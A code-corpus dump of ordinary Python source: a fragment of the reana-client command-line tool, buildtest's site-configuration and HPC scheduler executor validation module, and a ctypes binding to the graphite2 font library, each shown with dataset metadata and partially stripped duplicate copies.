click.echo(
click.style(
"Cannot delete workflow {} \n{}".format(workflow, str(e)), fg="red"
),
err=True,
)
@workflow_management_group.command("diff")
@click.argument(
"workflow_a",
default=os.environ.get("REANA_WORKON", None),
callback=workflow_uuid_or_name,
)
@click.argument("workflow_b", callback=workflow_uuid_or_name)
@click.option(
"-q",
"--brief",
is_flag=True,
help="If not set, differences in the contents of the files in the two "
"workspaces are shown.",
)
@click.option(
"-u",
"-U",
"--unified",
"context_lines",
type=int,
default=5,
help="Sets number of context lines for workspace diff output.",
)
@add_access_token_options
@check_connection
@click.pass_context
def workflow_diff(
ctx, workflow_a, workflow_b, brief, access_token, context_lines
): # noqa: D301
"""Show diff between two workflows.
The `diff` command allows to compare two workflows, the workflow_a and
workflow_b, which must be provided as arguments. The output will show the
difference in workflow run parameters, the generated files, the logs, etc.
Examples: \n
\t $ reana-client diff myanalysis.42 myotheranalysis.43 \n
\t $ reana-client diff myanalysis.42 myotheranalysis.43 --brief
"""
from reana_client.api.client import diff_workflows
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
def print_color_diff(lines):
for line in lines:
line_color = None
if line[0] == "@":
line_color = "cyan"
elif line[0] == "-":
line_color = "red"
elif line[0] == "+":
line_color = "green"
click.secho(line, fg=line_color)
leading_mark = "==>"
try:
response = diff_workflows(
workflow_a, workflow_b, brief, access_token, str(context_lines)
)
if response.get("reana_specification"):
specification_diff = json.loads(response["reana_specification"])
nonempty_sections = {k: v for k, v in specification_diff.items() if v}
if not nonempty_sections:
click.secho(
"{} No differences in REANA specifications.".format(leading_mark),
bold=True,
fg="yellow",
)
# Rename section workflow -> specification
if "workflow" in nonempty_sections:
nonempty_sections["specification"] = nonempty_sections.pop("workflow")
for section, content in nonempty_sections.items():
click.secho(
"{} Differences in workflow {}".format(leading_mark, section),
bold=True,
fg="yellow",
)
print_color_diff(content)
click.echo("") # Leave 1 line for separation
workspace_diff = json.loads(response.get("workspace_listing"))
if workspace_diff:
workspace_diff = workspace_diff.splitlines()
click.secho(
"{} Differences in workflow workspace".format(leading_mark),
bold=True,
fg="yellow",
)
print_color_diff(workspace_diff)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Something went wrong when trying to get diff:\n{}".format(str(e)),
fg="red",
),
err=True,
)
@click.group(help="Workspace interactive commands")
def interactive_group():
"""Workspace interactive commands."""
pass
@interactive_group.command("open")
@add_workflow_option
@click.argument(
"interactive-session-type",
metavar="interactive-session-type",
default=INTERACTIVE_SESSION_TYPES[0],
type=click.Choice(INTERACTIVE_SESSION_TYPES),
)
@click.option(
"-i",
"--image",
help="Docker image which will be used to spawn the interactive session. "
"Overrides the default image for the selected type.",
)
@add_access_token_options
@check_connection
@click.pass_context
def workflow_open_interactive_session(
ctx, workflow, interactive_session_type, image, access_token
): # noqa: D301
"""Open an interactive session inside the workspace.
The `open` command allows to open interactive session processes on top of
the workflow workspace, such as Jupyter notebooks. This is useful to
quickly inspect and analyse the produced files while the workflow is stlil
running.
Examples:\n
\t $ reana-client open -w myanalysis.42 jupyter
"""
from reana_client.api.client import open_interactive_session
if workflow:
try:
logging.info("Opening an interactive session on {}".format(workflow))
interactive_session_configuration = {
"image": image or None,
}
path = open_interactive_session(
workflow,
access_token,
interactive_session_type,
interactive_session_configuration,
)
click.secho(
format_session_uri(
reana_server_url=ctx.obj.reana_server_url,
path=path,
access_token=access_token,
),
fg="green",
)
click.echo(
"It could take several minutes to start the " "interactive session."
)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.secho(
"Interactive session could not be opened: \n{}".format(str(e)),
fg="red",
err=True,
)
else:
click.secho("Cannot find workflow {}".format(workflow), fg="red", err=True)
@interactive_group.command("close")
@add_workflow_option
@add_access_token_options
@check_connection
def workflow_close_interactive_session(workflow, access_token): # noqa: D301
"""Close an interactive session.
The `close` command allows to shut down any interactive sessions that you
may have running. You would typically use this command after you finished
exploring data in the Jupyter notebook and after you have transferred any
code created in your interactive session.
Examples:\n
\t $ reana-client close -w myanalysis.42
"""
from reana_client.api.client import close_interactive_session
if workflow:
try:
logging.info("Closing an interactive session on {}".format(workflow))
close_interactive_session(workflow, access_token)
click.echo(
"Interactive session for workflow {}"
" was successfully closed".format(workflow)
)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.secho(
"Interactive session could not be closed: \n{}".format(str(e)),
fg="red",
err=True,
)
else:
click.secho("Cannot find workflow {} ".format(workflow), fg="red", err=True)
| 3,012 | 0 | 108 |
f55121917310571bd99506aae23fcb3e38f91bbb | 12,863 | py | Python | buildtest/config.py | shahzebsiddiqui/buildtest-1 | 6c47424b82ec1e92ce0930f99be4ba10da62515c | [
"MIT"
] | null | null | null | buildtest/config.py | shahzebsiddiqui/buildtest-1 | 6c47424b82ec1e92ce0930f99be4ba10da62515c | [
"MIT"
] | 42 | 2021-04-20T11:11:06.000Z | 2022-03-30T16:54:24.000Z | buildtest/config.py | shahzebsiddiqui/buildtest-1 | 6c47424b82ec1e92ce0930f99be4ba10da62515c | [
"MIT"
] | null | null | null | import json
import logging
import re
from buildtest.defaults import (
DEFAULT_SETTINGS_FILE,
DEFAULT_SETTINGS_SCHEMA,
USER_SETTINGS_FILE,
)
from buildtest.exceptions import ConfigurationError
from buildtest.schemas.defaults import custom_validator
from buildtest.schemas.utils import load_recipe, load_schema
from buildtest.system import LSF, PBS, Cobalt, Slurm, system
from buildtest.utils.command import BuildTestCommand
from buildtest.utils.file import resolve_path
from buildtest.utils.tools import deep_get
logger = logging.getLogger(__name__)
class SiteConfiguration:
"""This class is an interface to buildtest configuration"""
    def load(self):
        """Loads configuration file"""
        # Parse the YAML configuration at the resolved path into a dict.
        # NOTE(review): assumes resolve() has already set self._file.
        self.config = load_recipe(self._file)
@property
@file.setter
    def resolve(self):
        """This method will resolve path to configuration file. The order of precedence is as follows:
        1. command line argument - Must be valid path
        2. User Configuration: $HOME/.buildtest/config.yml
        3. Default Configuration: $BUILDTEST_ROOT/buildtest/settings/config.yml
        """
        # First existing path wins.  NOTE(review): assumes resolve_path
        # returns None when the given path does not exist — confirm in
        # buildtest.utils.file.
        self._file = (
            resolve_path(self._file)
            or resolve_path(USER_SETTINGS_FILE)
            or DEFAULT_SETTINGS_FILE
        )
    def name(self):
        """Return name of matched system from configuration file"""
        # NOTE(review): relies on self._name being set by detect_system();
        # calling this before detect_system() would raise AttributeError —
        # confirm intended call order against the class constructor.
        return self._name
    def detect_system(self):
        """This method gets current system by setting ``self.target`` by matching ``hostnames`` entry
        in each system list with actual system. We retrieve target hostname and determine which system configuration to use.
        If no system is found we raise an error.
        """
        self.systems = list(self.config["system"].keys())
        # Map of system name -> configured hostname patterns; only used to
        # build the error message below.
        host_lookup = {}
        # get hostname fqdn
        cmd = BuildTestCommand("hostname -f")
        cmd.execute()
        hostname = " ".join(cmd.get_output())
        # for every system record we lookup 'hostnames' entry and apply re.match against current hostname. If found we break from loop
        for name in self.systems:
            host_lookup[name] = self.config["system"][name]["hostnames"]
            for host_entry in self.config["system"][name]["hostnames"]:
                if re.match(host_entry, hostname):
                    self.target_config = self.config["system"][name]
                    self._name = name
                    break
        # NOTE(review): assumes self.target_config is pre-initialised (e.g.
        # to None in __init__); otherwise an unmatched host would raise
        # AttributeError here instead of ConfigurationError — confirm.
        if not self.target_config:
            raise ConfigurationError(
                self.config,
                self.file,
                f"Based on current system hostname: {hostname} we cannot find a matching system {list(self.systems)} based on current hostnames: {host_lookup} ",
            )
        # Cache names of the local executors defined for the matched system.
        if self.target_config["executors"].get("local"):
            self.localexecutors = list(self.target_config["executors"]["local"].keys())
    def validate(self, validate_executors=True):
        """This method validates the site configuration with schema"""
        logger.debug(f"Loading default settings schema: {DEFAULT_SETTINGS_SCHEMA}")
        config_schema = load_schema(DEFAULT_SETTINGS_SCHEMA)
        logger.debug(
            f"Validating configuration file with schema: {DEFAULT_SETTINGS_SCHEMA}"
        )
        # Raises on schema violation; reaching the next line means success.
        custom_validator(recipe=self.config, schema=config_schema)
        logger.debug("Validation was successful")
        if validate_executors:
            self._executor_check()
        # The configured module tool must match what is detected on the
        # current system, unless it is explicitly set to "N/A".
        if (
            self.target_config.get("moduletool") != "N/A"
            and self.target_config.get("moduletool") != system.system["moduletool"]
        ):
            raise ConfigurationError(
                self.config,
                self.file,
                f"Cannot find modules_tool: {self.target_config['moduletool']} from configuration, please confirm if you have environment-modules or lmod and specify the appropriate tool.",
            )
    def _validate_lsf_executors(self):
        """This method validates all LSF executors. We check if queue is available
        and in ``Open:Active`` state.
        """
        lsf_executors = deep_get(self.target_config, "executors", "lsf")
        # Nothing to validate when no LSF executors are configured.
        if not lsf_executors:
            return
        lsf = LSF()
        # NOTE(review): LSF() is expected to populate 'queues' from the
        # scheduler's queue listing — confirm in buildtest.system.
        assert hasattr(lsf, "queues")
        queue_list = []
        valid_queue_state = "Open:Active"
        record = lsf.queues["RECORDS"]
        # retrieve all queues from json record
        for name in record:
            queue_list.append(name["QUEUE_NAME"])
        # check all executors have defined valid queues and check queue state.
        for executor in lsf_executors:
            queue = lsf_executors[executor].get("queue")
            # if queue field is defined check if its valid queue
            if queue:
                if queue not in queue_list:
                    raise ConfigurationError(
                        self.config,
                        self.file,
                        f"{lsf_executors[executor]['queue']} not a valid queue!. Please select one of the following queue: {queue_list}",
                    )
                # check queue record for Status
                for name in record:
                    # skip record until we find matching queue
                    if name["QUEUE_NAME"] != queue:
                        continue
                    queue_state = name["STATUS"]
                    # if state not Open:Active we raise error
                    if not queue_state == valid_queue_state:
                        raise ConfigurationError(
                            self.config,
                            self.file,
                            f"{lsf_executors[executor]['queue']} is in state: {queue_state}. It must be in {valid_queue_state} state in order to accept jobs",
                        )
            # NOTE(review): assumes self.lsfexecutors was initialised (likely
            # in __init__, which is outside this view) — confirm.
            self.lsfexecutors.append(executor)
    def _validate_slurm_executors(self):
        """This method will validate slurm executors, we check if partition, qos,
        and cluster fields are valid values by retrieving details from slurm configuration.
        These checks are performed on fields ``partition``, ``qos`` or ``cluster``
        if specified in executor section. Raises ConfigurationError on the first
        invalid value; executors that pass are appended to ``self.slurmexecutors``.
        """
        slurm_executor = deep_get(self.target_config, "executors", "slurm")
        if not slurm_executor:
            return
        # Slurm() queries the local scheduler for partitions, qos and clusters
        slurm = Slurm()
        # make sure slurm attributes slurm.partitions, slurm.qos, slurm.clusters are set
        assert hasattr(slurm, "partitions")
        assert hasattr(slurm, "qos")
        assert hasattr(slurm, "clusters")
        for executor in slurm_executor:
            # if 'partition' key defined check if its valid partition
            if slurm_executor[executor].get("partition"):
                if slurm_executor[executor]["partition"] not in slurm.partitions:
                    raise ConfigurationError(
                        self.config,
                        self.file,
                        f"{slurm_executor[executor]['partition']} not a valid partition!. Please select one of the following partitions: {slurm.partitions}",
                    )
                # ask sinfo for the partition availability; output is expected
                # to be the literal string 'up' when the partition accepts jobs
                query = (
                    f"sinfo -p {slurm_executor[executor]['partition']} -h -O available"
                )
                cmd = BuildTestCommand(query)
                cmd.execute()
                part_state = "".join(cmd.get_output())
                part_state = part_state.rstrip()
                # check if partition is in 'up' state. If not we raise an error.
                if part_state != "up":
                    raise ConfigurationError(
                        self.config,
                        self.file,
                        f"{slurm_executor[executor]['partition']} is in state: {part_state}. It must be in 'up' state in order to accept jobs",
                    )
            # check if 'qos' key is valid qos
            if (
                slurm_executor[executor].get("qos")
                and slurm_executor[executor].get("qos") not in slurm.qos
            ):
                raise ConfigurationError(
                    self.config,
                    self.file,
                    f"{slurm_executor[executor]['qos']} not a valid qos! Please select one of the following qos: {slurm.qos}",
                )
            # check if 'cluster' key is valid slurm cluster
            if (
                slurm_executor[executor].get("cluster")
                and slurm_executor[executor].get("cluster") not in slurm.clusters
            ):
                raise ConfigurationError(
                    self.config,
                    self.file,
                    f"{slurm_executor[executor]['cluster']} not a valid slurm cluster! Please select one of the following slurm clusters: {slurm.clusters}",
                )
            # executor passed all checks
            self.slurmexecutors.append(executor)
def _validate_cobalt_executors(self):
"""Validate cobalt queue property by running ```qstat -Ql <queue>``. If
its a non-zero exit code then queue doesn't exist otherwise it is a valid
queue.
"""
cobalt_executor = deep_get(self.target_config, "executors", "cobalt")
if not cobalt_executor:
return
cobalt = Cobalt()
assert hasattr(cobalt, "queues")
for executor in cobalt_executor:
queue = cobalt_executor[executor].get("queue")
# if queue property defined in cobalt executor name check if it exists
if queue not in cobalt.queues:
raise ConfigurationError(
self.config,
self.file,
f"Queue: {queue} does not exist! To see available queues you can run 'qstat -Ql'",
)
self.cobaltexecutors.append(executor)
    def _validate_pbs_executors(self):
        """Validate pbs queue property by running by checking if queue is found and
        queue is 'enabled' and 'started' which are two properties found in pbs queue
        configuration that can be retrieved using ``qstat -Q -f -F json``. The output is in
        the following format
        .. code-block:: console
            $ qstat -Q -f -F json
            {
                "timestamp":1615924938,
                "pbs_version":"19.0.0",
                "pbs_server":"pbs",
                "Queue":{
                    "workq":{
                        "queue_type":"Execution",
                        "total_jobs":0,
                        "state_count":"Transit:0 Queued:0 Held:0 Waiting:0 Running:0 Exiting:0 Begun:0 ",
                        "resources_assigned":{
                            "mem":"0kb",
                            "ncpus":0,
                            "nodect":0
                        },
                        "hasnodes":"True",
                        "enabled":"True",
                        "started":"True"
                    }
                }
            }
        """
        pbs_executor = deep_get(self.target_config, "executors", "pbs")
        if not pbs_executor:
            return
        # PBS() queries the local scheduler for available queues and their summary
        pbs = PBS()
        assert hasattr(pbs, "queues")
        for executor in pbs_executor:
            queue = pbs_executor[executor].get("queue")
            # the configured queue must exist in PBS
            if queue not in pbs.queues:
                raise ConfigurationError(
                    self.config, self.file, f"{queue} not in {pbs.queues}"
                )
            # qstat reports booleans as the strings "True"/"False"; the queue
            # must be both enabled and started to accept jobs
            if (
                pbs.queue_summary["Queue"][queue]["enabled"] != "True"
                or pbs.queue_summary["Queue"][queue]["started"] != "True"
            ):
                print("Queue Configuration")
                print(json.dumps(pbs.queue_summary, indent=2))
                raise ConfigurationError(
                    self.config,
                    self.file,
                    f"{queue} is not enabled or started properly. Please check your queue configuration",
                )
            # executor passed all checks
            self.pbsexecutors.append(executor)
| 38.169139 | 189 | 0.566042 | import json
import logging
import re
from buildtest.defaults import (
DEFAULT_SETTINGS_FILE,
DEFAULT_SETTINGS_SCHEMA,
USER_SETTINGS_FILE,
)
from buildtest.exceptions import ConfigurationError
from buildtest.schemas.defaults import custom_validator
from buildtest.schemas.utils import load_recipe, load_schema
from buildtest.system import LSF, PBS, Cobalt, Slurm, system
from buildtest.utils.command import BuildTestCommand
from buildtest.utils.file import resolve_path
from buildtest.utils.tools import deep_get
logger = logging.getLogger(__name__)
class SiteConfiguration:
"""This class is an interface to buildtest configuration"""
def __init__(self, settings_file=None):
self._file = settings_file
self.config = None
self._name = None
# self.target_config stores value for target system. The configuration may define multiple system,
# but only one system can be active depending on which host buildtest is run
self.target_config = None
self.localexecutors = []
self.slurmexecutors = []
self.lsfexecutors = []
self.cobaltexecutors = []
self.pbsexecutors = []
self.resolve()
self.load()
def load(self):
"""Loads configuration file"""
self.config = load_recipe(self._file)
@property
def file(self):
return self._file
@file.setter
def file(self, path):
self._file = path
def resolve(self):
"""This method will resolve path to configuration file. The order of precedence is as follows:
1. command line argument - Must be valid path
2. User Configuration: $HOME/.buildtest/config.yml
3. Default Configuration: $BUILDTEST_ROOT/buildtest/settings/config.yml
"""
self._file = (
resolve_path(self._file)
or resolve_path(USER_SETTINGS_FILE)
or DEFAULT_SETTINGS_FILE
)
def name(self):
"""Return name of matched system from configuration file"""
return self._name
def detect_system(self):
"""This method gets current system by setting ``self.target`` by matching ``hostnames`` entry
in each system list with actual system. We retrieve target hostname and determine which system configuration to use.
If no system is found we raise an error.
"""
self.systems = list(self.config["system"].keys())
host_lookup = {}
# get hostname fqdn
cmd = BuildTestCommand("hostname -f")
cmd.execute()
hostname = " ".join(cmd.get_output())
# for every system record we lookup 'hostnames' entry and apply re.match against current hostname. If found we break from loop
for name in self.systems:
host_lookup[name] = self.config["system"][name]["hostnames"]
for host_entry in self.config["system"][name]["hostnames"]:
if re.match(host_entry, hostname):
self.target_config = self.config["system"][name]
self._name = name
break
if not self.target_config:
raise ConfigurationError(
self.config,
self.file,
f"Based on current system hostname: {hostname} we cannot find a matching system {list(self.systems)} based on current hostnames: {host_lookup} ",
)
if self.target_config["executors"].get("local"):
self.localexecutors = list(self.target_config["executors"]["local"].keys())
def validate(self, validate_executors=True):
"""This method validates the site configuration with schema"""
logger.debug(f"Loading default settings schema: {DEFAULT_SETTINGS_SCHEMA}")
config_schema = load_schema(DEFAULT_SETTINGS_SCHEMA)
logger.debug(
f"Validating configuration file with schema: {DEFAULT_SETTINGS_SCHEMA}"
)
custom_validator(recipe=self.config, schema=config_schema)
logger.debug("Validation was successful")
if validate_executors:
self._executor_check()
if (
self.target_config.get("moduletool") != "N/A"
and self.target_config.get("moduletool") != system.system["moduletool"]
):
raise ConfigurationError(
self.config,
self.file,
f"Cannot find modules_tool: {self.target_config['moduletool']} from configuration, please confirm if you have environment-modules or lmod and specify the appropriate tool.",
)
def _executor_check(self):
self._validate_slurm_executors()
self._validate_lsf_executors()
self._validate_cobalt_executors()
self._validate_pbs_executors()
def _validate_lsf_executors(self):
"""This method validates all LSF executors. We check if queue is available
and in ``Open:Active`` state.
"""
lsf_executors = deep_get(self.target_config, "executors", "lsf")
if not lsf_executors:
return
lsf = LSF()
assert hasattr(lsf, "queues")
queue_list = []
valid_queue_state = "Open:Active"
record = lsf.queues["RECORDS"]
# retrieve all queues from json record
for name in record:
queue_list.append(name["QUEUE_NAME"])
# check all executors have defined valid queues and check queue state.
for executor in lsf_executors:
queue = lsf_executors[executor].get("queue")
# if queue field is defined check if its valid queue
if queue:
if queue not in queue_list:
raise ConfigurationError(
self.config,
self.file,
f"{lsf_executors[executor]['queue']} not a valid queue!. Please select one of the following queue: {queue_list}",
)
# check queue record for Status
for name in record:
# skip record until we find matching queue
if name["QUEUE_NAME"] != queue:
continue
queue_state = name["STATUS"]
# if state not Open:Active we raise error
if not queue_state == valid_queue_state:
raise ConfigurationError(
self.config,
self.file,
f"{lsf_executors[executor]['queue']} is in state: {queue_state}. It must be in {valid_queue_state} state in order to accept jobs",
)
self.lsfexecutors.append(executor)
def _validate_slurm_executors(self):
"""This method will validate slurm executors, we check if partition, qos,
and cluster fields are valid values by retrieving details from slurm configuration.
These checks are performed on fields ``partition``, ``qos`` or ``cluster``
if specified in executor section.
"""
slurm_executor = deep_get(self.target_config, "executors", "slurm")
if not slurm_executor:
return
slurm = Slurm()
# make sure slurm attributes slurm.partitions, slurm.qos, slurm.clusters are set
assert hasattr(slurm, "partitions")
assert hasattr(slurm, "qos")
assert hasattr(slurm, "clusters")
for executor in slurm_executor:
# if 'partition' key defined check if its valid partition
if slurm_executor[executor].get("partition"):
if slurm_executor[executor]["partition"] not in slurm.partitions:
raise ConfigurationError(
self.config,
self.file,
f"{slurm_executor[executor]['partition']} not a valid partition!. Please select one of the following partitions: {slurm.partitions}",
)
query = (
f"sinfo -p {slurm_executor[executor]['partition']} -h -O available"
)
cmd = BuildTestCommand(query)
cmd.execute()
part_state = "".join(cmd.get_output())
part_state = part_state.rstrip()
# check if partition is in 'up' state. If not we raise an error.
if part_state != "up":
raise ConfigurationError(
self.config,
self.file,
f"{slurm_executor[executor]['partition']} is in state: {part_state}. It must be in 'up' state in order to accept jobs",
)
# check if 'qos' key is valid qos
if (
slurm_executor[executor].get("qos")
and slurm_executor[executor].get("qos") not in slurm.qos
):
raise ConfigurationError(
self.config,
self.file,
f"{slurm_executor[executor]['qos']} not a valid qos! Please select one of the following qos: {slurm.qos}",
)
# check if 'cluster' key is valid slurm cluster
if (
slurm_executor[executor].get("cluster")
and slurm_executor[executor].get("cluster") not in slurm.clusters
):
raise ConfigurationError(
self.config,
self.file,
f"{slurm_executor[executor]['cluster']} not a valid slurm cluster! Please select one of the following slurm clusters: {slurm.clusters}",
)
self.slurmexecutors.append(executor)
def _validate_cobalt_executors(self):
"""Validate cobalt queue property by running ```qstat -Ql <queue>``. If
its a non-zero exit code then queue doesn't exist otherwise it is a valid
queue.
"""
cobalt_executor = deep_get(self.target_config, "executors", "cobalt")
if not cobalt_executor:
return
cobalt = Cobalt()
assert hasattr(cobalt, "queues")
for executor in cobalt_executor:
queue = cobalt_executor[executor].get("queue")
# if queue property defined in cobalt executor name check if it exists
if queue not in cobalt.queues:
raise ConfigurationError(
self.config,
self.file,
f"Queue: {queue} does not exist! To see available queues you can run 'qstat -Ql'",
)
self.cobaltexecutors.append(executor)
def _validate_pbs_executors(self):
"""Validate pbs queue property by running by checking if queue is found and
queue is 'enabled' and 'started' which are two properties found in pbs queue
configuration that can be retrieved using ``qstat -Q -f -F json``. The output is in
the following format
.. code-block:: console
$ qstat -Q -f -F json
{
"timestamp":1615924938,
"pbs_version":"19.0.0",
"pbs_server":"pbs",
"Queue":{
"workq":{
"queue_type":"Execution",
"total_jobs":0,
"state_count":"Transit:0 Queued:0 Held:0 Waiting:0 Running:0 Exiting:0 Begun:0 ",
"resources_assigned":{
"mem":"0kb",
"ncpus":0,
"nodect":0
},
"hasnodes":"True",
"enabled":"True",
"started":"True"
}
}
}
"""
pbs_executor = deep_get(self.target_config, "executors", "pbs")
if not pbs_executor:
return
pbs = PBS()
assert hasattr(pbs, "queues")
for executor in pbs_executor:
queue = pbs_executor[executor].get("queue")
if queue not in pbs.queues:
raise ConfigurationError(
self.config, self.file, f"{queue} not in {pbs.queues}"
)
if (
pbs.queue_summary["Queue"][queue]["enabled"] != "True"
or pbs.queue_summary["Queue"][queue]["started"] != "True"
):
print("Queue Configuration")
print(json.dumps(pbs.queue_summary, indent=2))
raise ConfigurationError(
self.config,
self.file,
f"{queue} is not enabled or started properly. Please check your queue configuration",
)
self.pbsexecutors.append(executor)
| 751 | 0 | 106 |
756d20aa02f85429376fdfee0f98ca46c91f170f | 11,781 | py | Python | libraries/graphite2-1.3.12/tests/graphite.py | myzhang1029/zmymingw | 4c6b6088fb8a03248a1e6d9d6126dfaf225ffa56 | [
"CC0-1.0"
] | null | null | null | libraries/graphite2-1.3.12/tests/graphite.py | myzhang1029/zmymingw | 4c6b6088fb8a03248a1e6d9d6126dfaf225ffa56 | [
"CC0-1.0"
] | null | null | null | libraries/graphite2-1.3.12/tests/graphite.py | myzhang1029/zmymingw | 4c6b6088fb8a03248a1e6d9d6126dfaf225ffa56 | [
"CC0-1.0"
] | null | null | null | # Copyright 2012, SIL International
# All rights reserved.
#
# This library is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation; either version 2.1 of License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should also have received a copy of the GNU Lesser General Public
# License along with this library in the file named "LICENSE".
# If not, write to the Free Software Foundation, 51 Franklin Street,
# suite 500, Boston, MA 02110-1335, USA or visit their web page on the
# internet at http://www.fsf.org/licenses/lgpl.html.
from __future__ import print_function, unicode_literals, division, absolute_import
try:
unicode
except NameError:
unicode = str
from ctypes import *
import ctypes.util
import sys, os, platform
gr2 = cdll.LoadLibrary(os.environ.get('PYGRAPHITE2_LIBRARY_PATH',
ctypes.util.find_library("graphite2")))
tablefn = CFUNCTYPE(c_void_p, c_void_p, c_uint, POINTER(c_size_t))
advfn = CFUNCTYPE(c_float, c_void_p, c_ushort)

def grversion() :
    """Return the (major, minor, bugfix) version of the loaded graphite2 engine."""
    a = c_int()
    b = c_int()
    c = c_int()
    gr2.gr_engine_version(byref(a), byref(b), byref(c))
    return (a.value, b.value, c.value)

def fn(name, res, *params) :
    """Declare restype/argtypes for the graphite2 entry point *name* on gr2."""
    f = getattr(gr2, name)
    f.restype = res
    f.argtypes = params

class FaceInfo(Structure) :
    """ctypes mirror of the C struct returned by ``gr_face_info``."""
    _fields_ = [("extra_ascent", c_ushort),
                ("extra_descent", c_ushort),
                ("upem", c_ushort)]

# NOTE(fix): grversion, fn and FaceInfo were referenced below but not defined
# anywhere in this file, so importing the module raised NameError; the three
# definitions above restore them.

# --- graphite2 entry-point declarations ---
fn('gr_engine_version', None, POINTER(c_int), POINTER(c_int), POINTER(c_int))
fn('gr_make_face', c_void_p, c_void_p, tablefn, c_uint)
fn('gr_str_to_tag', c_uint32, c_char_p)
fn('gr_tag_to_str', None, c_uint32, POINTER(c_char))
fn('gr_face_featureval_for_lang', c_void_p, c_void_p, c_uint32)
fn('gr_face_find_fref', c_void_p, c_void_p, c_uint32)
fn('gr_face_n_fref', c_uint16, c_void_p)
fn('gr_face_fref', c_void_p, c_void_p, c_uint16)
fn('gr_face_n_languages', c_ushort, c_void_p)
fn('gr_face_lang_by_index', c_uint32, c_void_p, c_uint16)
fn('gr_face_destroy', None, c_void_p)
fn('gr_face_n_glyphs', c_ushort, c_void_p)
fn('gr_face_info', POINTER(FaceInfo), c_void_p)
fn('gr_face_is_char_supported', c_int, c_void_p, c_uint32, c_uint32)
fn('gr_make_file_face', c_void_p, c_char_p, c_uint)
fn('gr_make_font', c_void_p, c_float, c_void_p)
fn('gr_make_font_with_advance_fn', c_void_p, c_float, c_void_p, advfn, c_void_p)
fn('gr_font_destroy', None, c_void_p)
fn('gr_fref_feature_value', c_uint16, c_void_p, c_void_p)
fn('gr_fref_set_feature_value', c_int, c_void_p, c_uint16, c_void_p)
fn('gr_fref_id', c_uint32, c_void_p)
fn('gr_fref_n_values', c_uint16, c_void_p)
fn('gr_fref_value', c_int16, c_void_p, c_uint16)
fn('gr_fref_label', c_void_p, c_void_p, POINTER(c_uint16), c_int, POINTER(c_uint32))
fn('gr_fref_value_label', c_void_p, c_void_p, c_uint16, POINTER(c_uint16), c_int, POINTER(c_uint32))
fn('gr_label_destroy', None, c_void_p)
fn('gr_featureval_clone', c_void_p, c_void_p)
fn('gr_featureval_destroy', None, c_void_p)
fn('gr_cinfo_unicode_char', c_uint, c_void_p)
fn('gr_cinfo_break_weight', c_int, c_void_p)
fn('gr_cinfo_after', c_int, c_void_p)
fn('gr_cinfo_before', c_int, c_void_p)
fn('gr_cinfo_base', c_size_t, c_void_p)
fn('gr_count_unicode_characters', c_size_t, c_int, c_void_p, c_void_p, POINTER(c_void_p))
fn('gr_make_seg', c_void_p, c_void_p, c_void_p, c_uint32, c_void_p, c_int, c_void_p, c_size_t, c_int)
fn('gr_seg_destroy', None, c_void_p)
fn('gr_seg_advance_X', c_float, c_void_p)
fn('gr_seg_advance_Y', c_float, c_void_p)
fn('gr_seg_n_cinfo', c_uint, c_void_p)
fn('gr_seg_cinfo', c_void_p, c_void_p, c_uint)
fn('gr_seg_n_slots', c_uint, c_void_p)
fn('gr_seg_first_slot', c_void_p, c_void_p)
fn('gr_seg_last_slot', c_void_p, c_void_p)
fn('gr_seg_justify', c_float, c_void_p, c_void_p, c_void_p, c_double, c_int, c_void_p, c_void_p)
fn('gr_slot_next_in_segment', c_void_p, c_void_p)
fn('gr_slot_prev_in_segment', c_void_p, c_void_p)
fn('gr_slot_attached_to', c_void_p, c_void_p)
fn('gr_slot_first_attachment', c_void_p, c_void_p)
fn('gr_slot_next_sibling_attachment', c_void_p, c_void_p)
fn('gr_slot_gid', c_ushort, c_void_p)
fn('gr_slot_origin_X', c_float, c_void_p)
fn('gr_slot_origin_Y', c_float, c_void_p)
fn('gr_slot_advance_X', c_float, c_void_p)
fn('gr_slot_advance_Y', c_float, c_void_p)
fn('gr_slot_before', c_int, c_void_p)
fn('gr_slot_after', c_int, c_void_p)
fn('gr_slot_index', c_uint, c_void_p)
fn('gr_slot_attr', c_int, c_void_p, c_void_p, c_int, c_uint8)
fn('gr_slot_can_insert_before', c_int, c_void_p)
fn('gr_slot_original', c_int, c_void_p)
fn('gr_slot_linebreak_before', None, c_void_p)

# logging entry points were renamed after engine version 1.1
(major, minor, debug) = grversion()
if major > 1 or minor > 1 :
    fn('gr_start_logging', c_int, c_void_p, c_char_p)
    fn('gr_stop_logging', None, c_void_p)
else :
    fn('graphite_start_logging', c_int, c_void_p, c_int)
    fn('graphite_stop_logging', None)
| 32.454545 | 163 | 0.678975 | # Copyright 2012, SIL International
# All rights reserved.
#
# This library is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation; either version 2.1 of License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should also have received a copy of the GNU Lesser General Public
# License along with this library in the file named "LICENSE".
# If not, write to the Free Software Foundation, 51 Franklin Street,
# suite 500, Boston, MA 02110-1335, USA or visit their web page on the
# internet at http://www.fsf.org/licenses/lgpl.html.
from __future__ import print_function, unicode_literals, division, absolute_import
try:
unicode
except NameError:
unicode = str
from ctypes import *
import ctypes.util
import sys, os, platform
gr2 = cdll.LoadLibrary(os.environ.get('PYGRAPHITE2_LIBRARY_PATH',
ctypes.util.find_library("graphite2")))
def grversion() :
    """Return the (major, minor, bugfix) version triple of the loaded engine."""
    parts = (c_int(), c_int(), c_int())
    gr2.gr_engine_version(*[byref(p) for p in parts])
    return tuple(p.value for p in parts)
def fn(name, res, *params) :
    """Declare the signature of graphite2 entry point *name*.

    ``res`` is the ctypes restype and ``params`` are the argtypes; the
    function object is looked up on the loaded ``gr2`` library and mutated
    in place.
    """
    f = getattr(gr2, name)
    f.restype = res
    f.argtypes = params
